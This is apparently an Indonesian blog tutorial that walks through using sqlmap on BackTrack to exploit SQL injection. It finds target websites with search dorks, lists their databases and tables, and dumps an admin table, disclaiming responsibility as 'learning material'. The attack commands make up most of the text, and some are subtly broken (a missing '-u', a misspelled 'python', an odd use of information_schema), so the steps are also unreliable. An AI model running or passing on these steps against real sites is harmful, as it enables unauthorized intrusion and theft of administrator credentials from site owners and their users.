Sqlmap.
Sqlmap adalah salah satu tools pentest di linux tepat nya backtrack kegunaan nya untuk mengexploitasi web yang vulner terhadap serangan sql injection..:).
ok,langsung aja.
1.pertana
kita buka dulu tool ini
Application >> Backtrack >> Exploitation >> Web Exploitation Tools >> SqlMap
2.cari target
lewat Dork
Klik Disini | Dork Sqi List
3.Setelah dapet web yang ada celah nya,mari kita ritual :P
python sqlmap.py -u http://target.com/catagory.php?id=8 --dbs
Keterangan :
-u = url
--dbs = Untuk mencari database...
4.Next,kita dapet database nya
masukin dah nama database nya
python sqlmap.py -u http://www.target.com/catagory.php?id=8 -D information_schema --tables
5.isi tabel udah keluar dan ada hasilnya seperti gambar di bawah ini,
dan ternyata lagi :D ada table Admin nya...
langsung Exsekusi dah ...
python sqlmap.py http://target.com/catagory.php?id=8 -D information_schema -T admin --columns
6.liat isi table admin
pytho sqlmap.py http://target.com -D information_schema -T Admin --dump
ok selsai dari saya,pokok ini hanya untuk materi pembelajaran aja om :D
ane gak tanggung jawab bila terjadi sesuatu ....
Jika masih kurang jelas lagi,kalian bisa lihat video berikut :
